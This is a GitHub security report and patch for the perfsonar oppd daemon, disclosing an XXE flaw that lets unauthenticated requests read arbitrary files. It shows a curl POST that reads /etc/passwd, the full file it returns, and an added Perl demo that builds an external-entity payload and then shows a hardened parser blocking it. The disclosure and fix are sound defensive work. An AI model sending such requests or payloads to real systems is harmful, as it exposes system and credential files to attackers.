perfsonar / oppd

On-demand measurement point daemon
Apache License 2.0

[Security] Arbitrary File Read via XXE #9

Closed bored-engineer closed 8 years ago

bored-engineer commented 8 years ago

LibXML allows the loading of external entities by default, allowing unauthenticated arbitrary file read from the system using XXE.

This patch disables external entity processing by creating an ext_ent_handler that returns an empty string.

bored-engineer commented 8 years ago

You can test this issue by downloading this file: oppd.xml. Then running the following command will return /etc/passwd:

# curl -X POST http://172.16.240.138:8090/ -d @oppd.xml
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">  <SOAP-ENV:Header/>  <SOAP-ENV:Body><nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" xmlns:nmwgr="http://ggf.org/ns/nmwg/result/2.0/" type="ErrorResponse">       <nmwg:data>             root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
nagios:x:499:499::/var/spool/nagios:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rtkit:x:498:498:RealtimeKit:/proc:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
cassandra:x:497:497::/usr/share/cassandra:/bin/bash
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
owamp:x:496:496::/tmp:/bin/nologin
bwctl:x:495:495::/tmp:/bin/nologin
perfsonar:x:494:500:perfSONAR User:/tmp:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
saslauth:x:493:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
memcached:x:492:494:Memcached daemon:/var/run/memcached:/sbin/nologin
esmond:x:491:501:Esmond User:/tmp:/sbin/nologin
pulse:x:490:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
admin:x:500:504::/home/admin:/bin/bash
sudo:x:501:505::/home/sudo:/bin/bash
        </nmwg:data>        <nmwg:metadata id="return_message"><nmwg:eventType>error.nmwg.action_not_supported</nmwg:eventType></nmwg:metadata><nmwg:data metadataIdRef="return_message" id="data_return_message"><nmwgr:datum>Unknown messagetype: </nmwgr:datum></nmwg:data></nmwg:message></SOAP-ENV:Body></SOAP-ENV:Envelope>
laeti-tia commented 8 years ago

Thanks for this report!
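The hardening this patch describes, as an added example rather than the project's own code: a default XML::LibXML parser beside one configured with an ext_ent_handler that returns an empty string (plus the companion options), both run over a constructed request in the nmwg message shape. The temporary file, the extract_data helper and the element names used are assumptions for the demonstration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempfile);
use XML::LibXML;

# Constructed stand-in for a sensitive local file (not /etc/passwd).
my ($fh, $secret_path) = tempfile();
print {$fh} "secret-contents\n";
close $fh;

# Constructed request: an nmwg message whose internal DTD subset declares an
# external entity pointing at the local file, referenced in element content.
my $request = <<"XML";
<?xml version="1.0"?>
<!DOCTYPE nmwg:message [
  <!ENTITY ext SYSTEM "file://$secret_path">
]>
<nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" type="MeasurementRequest">
  <nmwg:data>&ext;</nmwg:data>
</nmwg:message>
XML

# Helper (assumed, not part of oppd): parse the request and return the text of
# the first nmwg:data child, which is where the entity replacement would land.
sub extract_data {
    my ($parser) = @_;
    my $doc    = $parser->parse_string($request);
    my ($data) = $doc->documentElement->getChildrenByLocalName('data');
    return defined $data ? $data->textContent : '';
}

# Default settings: external entities are loaded, so the file contents appear
# in the parsed document (and, in the daemon, are echoed back in its reply).
my $default = XML::LibXML->new();
printf "default parser : '%s'\n", extract_data($default);

# Hardened: the ext_ent_handler never hands libxml2 any external content, so the
# reference expands to nothing; load_ext_dtd/no_network close the DTD and
# network paths as well, and huge => 0 keeps libxml2's entity size limits on.
my $hardened = XML::LibXML->new(
    ext_ent_handler => sub { return '' },
    load_ext_dtd    => 0,
    no_network      => 1,
    huge            => 0,
);
printf "hardened parser: '%s'\n", extract_data($hardened);
unlink $secret_path;
```

The first line prints the temp file's contents; the second prints an empty string, which is the behaviour the patch gives the daemon.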